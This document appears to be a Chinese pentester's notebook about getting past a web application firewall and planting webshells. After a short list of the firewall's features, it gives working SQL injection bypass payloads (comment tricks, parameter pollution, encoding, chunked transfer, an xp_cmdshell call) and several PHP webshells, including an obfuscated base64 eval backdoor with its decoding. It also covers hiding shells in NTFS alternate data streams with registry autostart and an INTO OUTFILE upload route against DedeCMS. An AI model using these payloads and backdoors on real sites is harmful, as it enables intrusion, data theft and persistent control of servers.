• 网页木马和网页挂马扫描工具采用特征码+启发式引擎的查杀算法，WEB木马检出率大于90%

• 可拦截GET、POST、COOKIES等方式的SQL注入，可对GET、POST、COOKIES分别定义特征码，以及可拦截XSS注入等行为。

• 能够实时监测到每个网站的进出流量和总流量，以及每个应用程序池及网站的CPU占用情况

• 全面拦截恶意代码对组件的调用权限，拦截IIS执行恶意程序，保护网站安全

• 快捷设置.Net安全模式，禁止.Net执行系统敏感函数，保障网站安全

• 可以针对不同站点设置防盗链的过滤, 防止图片、桌面、软件、音乐、电影被人引用。如果发现请求者是盗用网站链接, 则自动重定向到错误处理页面

• 支持对doc、mdb、mdf、myd等特定资源的防下载保护，加入要保护的敏感资料的路径，即可防止敏感资料被下载

• 自主研发的独特抗攻击算法，高效的主动防御系统可有效防御CC攻击、流量攻击。

• 全IP黑白名单功能允许用户设置个性化的IP信任列表，直接屏蔽或者允许指定IP访问网站。同时，增加iP临时黑名单功能，以及实现了针对某个功能的iP白名单功能。同时，爬虫白名单提供爬虫信任机制，在出现误拦截情况下，允许用户自定义爬虫信任。

• 老版本的WAF是有这个漏洞的，就是把User-Agent修改为搜索引擎，便可以绕过，进行sql注入等攻击
• burp suite抓包替换user-agent头：
• 

• 判断是否为admin、dede、install等目录，如果是，则不做拦截

• 伪造为127.0.0.1，使用burp suite插件
• 
• 添加过滤本地ip waf插件到bp
• 
• 
• 请求发送到重发器，可以看到已经伪造了IP地址
• 

• 采用URL编码绕过，现在基本已经被防御
• 

• 把get提交的请求换为post即可绕过waf
• 

• 例如一个请求是这样的
  GET /pen/news.php?id=1 union select user,password from mysql.user
  可以修改为
  GET pen/news.php?id=1&id=union&id=select&id=user,password&id=from%20mysql.user
  很多WAF都可以这样绕，测试最新版WAF能绕过部分语句
• 

• 特殊字符替换空格：
  • mysql里%0a是换行，可以代替空格，也可以使用内联注释绕过
    • http://192.168.0.142:8080/sql.php?id=1/*|%23--%23|*/and/*|%23--%23|*/1=2   //%23为#号
  • sqlserver中/**/代替空格，函数后边是可以接内联注释的：
    • 内联注释：mysql里有三种注释方式： -- 注释    # (单行注释)   /* */(多行注释)   |  如果在/*后加惊叹号!意为/* */里的语句将被执行
      • 1.利用()代替空格
        2.利用mysql特性/*!*/执行语句
        3.利用/**/混淆代码
        我给出的注入语句是：
        union/*%00*//*!50010select*/(database/**/()),(user/**/())%23
        id=1/*|%23--%23|*/unioN/*|%23--%23|*/sElect/*|%23--%23|*/1,     user(),(database/**/()),4,5
        
        http://192.168.0.102:8080/sql.php?id=1 union/*%00*//*!50010select*/1,user(),version(),4,5
        这里要注意的几点是：
        1.mysql关键字中是不能插入/**/的，即se/**/lect是会报错的，但是函数名和括号之间是可以加上/**/的,像database/**/()这样的代码是可以执行的
        2./*!*/中间的代码是可以执行的，其中50010为mysql版本号，只要mysql大于这个版本就会执行里面的代码
        3.数据或者函数周围可以无限嵌套()
        4.利用好%00
• 特殊字符拼接：
  • 如：GET /pen/news.php?id=1;exec(master..xp_cmdshell 'net user')
    可以改为：GET /pen/news.php?id=1; exec('maste'+'r..xp'+'_cmdshell'+'"net user"')
     
• 注释包含关键词绕过：
  • mysql中使用/*!*/包含关键词绕过，加个！是执行注释里边内容的意思。
  • 如: GET /pen/news.php?id=1 union select user,password from mysql.user
    可以改为: GET /pen/news.php?id=1 /*!union*/ /*!select*/  user,password /*!from*/ mysql.user
• 等价替换：
  • select~  select~1  select!  select@  都等同于select，绕过
  • and 1=1 换成 and -1=-1 或则 and -2=-2等等
  • 空格替换为   %0a/**/
  • 大小写替换：?page_id=-15 uNIoN sELecT 1,2,3,4….
  • 双写替换法：?page_id=-15 UNIunionON SELselectECT 1,2,3,4…
  • 编码与注释混合：?page_id=-15 %55nION/**/%53ElecT 1,2,3,4…
  • waf本身功能绕过：如果waf把*替换为空，则可以利用这个特性绕过：?page_id=-15+uni*on+sel*ect+1,2,3,4....
  • 使用其他变量或者命令对注入语句进行替换（实际中很有作用）：MOD为求余运算

  • COMMAND | WHAT TO USE INSTEAD
    @@version | version()
    concat() | concat_ws()
    group_concat() | concat_ws()
    = | like
    

  • 

   

• 异或绕过：
  • 在 ^ 没有被过滤的时候可以1用它来测试，异或： Xor 或 ^，1 ^ 0 = 1,1 ^ 1 = 0
  • 

   

   

• 换行绕过：
  • 换行符绕过：%23%0a、%2d%2d%0a，%23是url编码中的#(也就是mysql中的注释符)，%0a是（也就是换行符，后面的语句就成功执行了）
• 替换法绕过：
  • 构造 1 && True --+就可以绕过
  • 
• 分块传输（比较厉害，以前干掉所有waf）：
  • 使用bp插件添加分块传输头，Transfer-Encoding:chunked进行分块传输
  • 

   

• <?
  $path = $_POST['x'];
  $text = $_POST['y'];
  $file = fopen($path, "w+");
  fwrite($file,$text);
  fclose($file);
  ?>
  <form action="" method="post">
  读取当前文件路径：
  <? echo $_SERVER['DOCUMENT_ROOT'].$_SERVER['PHP_SELF'];?></br>
  保存路径：<input name="x" type="text" /><br>
  写入内容:<br><textarea name="y" cols="90" rows="50"></textarea></br>
  <input name="" type="submit" value="提交"/>
  
  </form>
  

<?php 
$mt="JF9QT1N"; 
$ojj="QGV2YWwo";
$hsa="UWydpMGle";
$fnx="5BeSleleddKTs=";
$zk = str_replace("d","","sdtdrd_redpdldadcde"); 
$ef = $zk("z", "", "zbazsze64_zdzeczodze"); 
$dva = $zk("p","","pcprpepaptpe_fpupnpcptpipopn"); 
$zvm = $dva('', $ef($zk("le", "", $ojj.$mt.$hsa.$fnx))); 
$zvm(); 
?>

——————————————————————————————————————————————————————

str_replace：参数：("需要匹配的字符","替换字符","需要匹配的对象")

$zk=str_replace("d","","sdtdrd_redpdldadcde")=str_replace    // $zk=str_replace
$ef=str_replace("z", "", "zbazsze64_zdzeczodze")=base64_decode   // $ef=base64_decode
$dva=str_replace("p","","pcprpepaptpe_fpupnpcptpipopn")=create_function  //$dva=create_function

$ojj.$mt.$hsa.$fnx=QGV2YWwoJF9QT1NUWydpMGle5BeSleleddKTs=
str_replace(("le", "", "QGV2YWwoJF9QT1NUWydpMGle5BeSleleddKTs=")=QGV2YWwoJF9QT1NUWydpMG5BeSddKTs=

base64_decode("QGV2YWwoJF9QT1NUWydpMG5BeSddKTs=")=@eval($_POST['i0nAy']);
create_function('',@eval($_POST['i0nAy']);)
$zvm(); 

<?php 
//t.php  
$test = $_GET['r'];  
echo /*%00*//*!*/(`$test`)/*%00*//*%00*//*%00*/;
?>

<?php 
$a = substr_replace("assexy","rt",4);  
$b = array(''=>$a($_POST['q']));
var_dump($b);
?>

<?php
$h='f';
$$h=$_REQUEST['x'];                //$$h可以理解为先解析后边这个$h，然后在进行解析，最终解析成为$f
$d='CHECK';
$$d='ass';
$$d=$CHECK.'ert';
$CHECK($f);
?>

• 通过NTFS交换数据流文件实现文件隐藏
  echo hello>>test.txt:webshell.php   创建数据流文件
  dir /r  查看数据流文件
  notepad muma.php 新建一个一句话木马文件
  通过命令 type muma.php>>test.txt:muma.php来创建新的交换数据流文件
  数据流文件执行方法:是直接在注册表中的run键下添加数据流文件的完整路径:HKEY_LOCAL_MACHINE/Software/Microsoft/Windows/CurrentVersion/Run，建立键值"123" = %filepath%: %streamName%，下次系统启动时就会自动运行该隐藏文件

• 执行木马函数转换为数据流文件
• 
• 使用include函数把NTFS流文件包含进去，完成木马上传
• 

• 使用7kb遍历网站url，找到后台地址
• 
• 再使用burp suite暴力破解后台账号密码
• 
• 登录后台账号密码把一句话木马插到配置文件里，7kb扫描出来配置文件后直接使用菜刀进行连接获取webshell
• 
• 
• 

• 使用数据库备份功能上传木马，配合解析漏洞获取webshell
• 
• 
• 

• 前期：修改 /include/uploadsafe.inc.php 第45行：$imtypes = array 改成 $imgtypes = array，再更新缓存即可。
• 思路1：通过自带文件上传功能获取webshell
• 
• 思路2：使用数据库备份命令上传木马至服务器从而获取webshell，在写入mysql数据库文件操作时需要设置配置文件
• 前期：需要在my.ini里设置：secure_file_priv=''
• select '<?php @eval($_POST[pass]);?>' INTO OUTFILE 'C:\\phpStudy\\WWW\\best111111.php';
• 
•